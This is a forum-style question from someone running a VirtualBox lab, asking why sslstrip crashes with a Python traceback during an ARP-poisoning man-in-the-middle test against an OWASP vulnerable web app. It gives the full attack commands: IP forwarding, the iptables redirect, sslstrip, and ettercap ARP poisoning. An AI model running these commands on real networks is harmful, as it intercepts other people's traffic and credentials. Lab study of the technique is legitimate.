I have 3 VM's running in VirtualBox. All 3 VM's are connected to a virtual network created from VirtualBox with the IP 192.168.56.1/24
For all VM's are configured Host only Adapter
1 Linux web server that hosts the OWASP broken web applications : 192.168.56.3
2 windows machine that is a client accessing the website : 192.168.56.5
3 Kali linux machine performing a man in the middle attack : 192.168.56.4
Here is what I did.
sslstrip is started
First sslstrip is started.
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080 --favicon --write=/root/Lessons/sslstrip/sslstrip.log
ettercap is started
ettercap --mitm ARP:REMOTE --quiet --text --write ~/Lessons/ettercap/ettercap.log --iface eth0 /192.168.56.3// /192.168.56.5//
Output
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.56.3 08:00:27:FE:F6:AC
GROUP 2 : 192.168.56.5 08:00:27:E6:E5:59
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Now from the windows client browser I visit the home page 192.168.56.3/
It loads correctly.
Now I click one of the links, Mutillidae II
This causes an error in sslstrip
Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 103, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 86, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 122, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 85, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/local/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
why = selectable.doRead()
File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 243, in doRead
return self._dataReceived(data)
File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 249, in _dataReceived
rval = self.protocol.dataReceived(data)
File "/usr/local/lib/python2.7/dist-packages/twisted/protocols/basic.py", line 579, in dataReceived
why = self.rawDataReceived(data)
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 649, in rawDataReceived
self.handleResponseEnd()
File "/usr/local/lib/python2.7/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 612, in handleResponseEnd
self.handleResponse(b)
File "/usr/local/lib/python2.7/dist-packages/sslstrip/ServerConnection.py", line 131, in handleResponse
self.client.setHeader('Content-Length', len(data))
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 1314, in setHeader
self.responseHeaders.setRawHeaders(name, [value])
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http_headers.py", line 220, in setRawHeaders
for v in self._encodeValues(values)]
File "/usr/local/lib/python2.7/dist-packages/twisted/web/http_headers.py", line 40, in _sanitizeLinearWhitespace
return b' '.join(headerComponent.splitlines())
exceptions.AttributeError: 'int' object has no attribute 'splitlines'
If I manually put https in the address bar, this error doesn't happen. But then no SSL stripping happens.
